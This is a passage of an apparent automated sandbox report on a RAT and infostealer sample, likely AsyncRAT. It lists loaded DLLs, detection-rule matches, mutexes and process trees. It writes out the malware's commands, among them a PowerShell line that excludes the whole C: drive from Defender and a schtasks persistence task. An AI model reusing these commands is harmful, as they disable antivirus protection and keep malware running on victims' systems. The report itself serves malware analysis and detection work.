                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: wintypes.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: wintypes.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: windows.storage.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: wldp.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: windows.ui.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: windowmanagementapi.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: inputhost.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: propsys.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: profapi.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: wtsapi32.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: winsta.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: mscms.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: coloradapterclient.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: windows.security.authentication.web.core.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: iertutil.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: devobj.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: msasn1.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: cryptsp.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: rsaenh.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dataexchange.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: d3d11.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dcomp.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dxgi.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: netapi32.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: uiautomationcore.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: atlthunk.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: oleacc.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: directmanipulation.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: uxtheme.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dxgi.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: resourcepolicyclient.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: cryptbase.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: cryptbase.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: mf.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: mfplat.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: rtworkq.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: hevcdecoder.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dolbydecmft.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: mfperfhelper.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dwmapi.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: policymanager.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: msvcp110_win.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: d3d11.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: d3d10warp.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dxcore.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dcomp.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dbghelp.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: dwrite.dll
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeSection loaded: kernel.appcore.dll
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 9.2.aspnet_compiler.exe.7760000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.aspnet_compiler.exe.7760000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000009.00000002.3711384740.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000009.00000002.3640012189.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0000002B.00000002.2519566978.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, ParserSingleton.csCryptographic APIs: 'CreateDecryptor'
                  Source: WinUpdate.exe.0.dr, ParserSingleton.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, drOWx3ijLnZNE87xld.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, drOWx3ijLnZNE87xld.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, drOWx3ijLnZNE87xld.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, dtUkAEdqlu9lYBqc0Yu.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, dtUkAEdqlu9lYBqc0Yu.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, AlgorithmAES.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, StructSingleton.csBase64 encoded string: 'V+fw8AExKszm4gg5Z+rq6wpyRe3w4Qk+aOe4wwEoQfD39h0dd+3m6QYwfaXk4RADQuvv6Co9afu46xQDTfDm9RE9aPf3/V87YercyAEyY+rrvyM5cMr69AEadvHuzAUyYPLmvwM5cMHN5Qk5P9ft4AEkS/i41gE9YM339g0yY6XC4ABnY/v32zQzd/f37QsyP/nm8Dsfcezx4QooQPHu5Q0yP83m8CA9cP+4sl1uMaXC9xc5afzv/Tc5dujm9l8PbfPz6AEdd+3m6QYwfdv79AgzdvvxvwY9Zvvv8glnd/Ps7wEoYe33'
                  Source: WinUpdate.exe.0.dr, StructSingleton.csBase64 encoded string: 'V+fw8AExKszm4gg5Z+rq6wpyRe3w4Qk+aOe4wwEoQfD39h0dd+3m6QYwfaXk4RADQuvv6Co9afu46xQDTfDm9RE9aPf3/V87YercyAEyY+rrvyM5cMr69AEadvHuzAUyYPLmvwM5cMHN5Qk5P9ft4AEkS/i41gE9YM339g0yY6XC4ABnY/v32zQzd/f37QsyP/nm8Dsfcezx4QooQPHu5Q0yP83m8CA9cP+4sl1uMaXC9xc5afzv/Tc5dujm9l8PbfPz6AEdd+3m6QYwfdv79AgzdvvxvwY9Zvvv8glnd/Ps7wEoYe33'
                  Source: classification engineClassification label: mal98.troj.spyw.evad.mine.winEXE@60/380@14/8
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00404CE9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,8_2_00404CE9
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00406502 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,8_2_00406502
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_004049E7 CoInitialize,CoCreateInstance,8_2_004049E7
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot MasterJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeFile created: C:\Users\user\AppData\Local\WinUpdate.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeMutant created: \Sessions\1\BaseNamedObjects\IF
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMutant created: \Sessions\1\BaseNamedObjects\Pkgvug
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2164:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\zQYWh5tum6iyRPdS
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeFile created: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeJump to behavior
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: msedgewebview2.exe, 0000001D.00000002.3699087294.00002DDC007D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT id, storage_key, type, name, expiration, quota, persistent, durability FROM buckets WHERE storage_key = ? AND type = ? AND name = ?);
                  Source: msedgewebview2.exe, 0000001D.00000002.3663676347.0000021F329C5000.00000002.00000001.00040000.00000033.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeReversingLabs: Detection: 50%
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeVirustotal: Detection: 60%
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -exclusionpath C:\
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess created: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe "C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe C:\Users\user\AppData\Roaming\XClient.exe
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\WinUpdate.exe "C:\Users\user\AppData\Local\WinUpdate.exe"
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k START "" "C:\Users\user\AppData\Local\WinUpdate.exe" & EXIT
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\WinUpdate.exe "C:\Users\user\AppData\Local\WinUpdate.exe"
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -exclusionpath C:\
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeProcess created: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=6256.5040.8042992908347816484
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=117.0.5938.132 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=117.0.2045.47 --initial-client-data=0x15c,0x160,0x164,0x138,0x170,0x7ffdfb488e88,0x7ffdfb488e98,0x7ffdfb488ea8
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1736 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:2
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2196 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:3
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe C:\Users\user\AppData\Roaming\XClient.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\WinUpdate.exe "C:\Users\user\AppData\Local\WinUpdate.exe"
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2488 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6386081770 --mojo-platform-channel-handle=3380 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6388632569 --mojo-platform-channel-handle=3928 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6390330874 --mojo-platform-channel-handle=4280 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe "C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe"
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe C:\Users\user\AppData\Roaming\XClient.exe
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe C:\Users\user\AppData\Roaming\XClient.exe
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
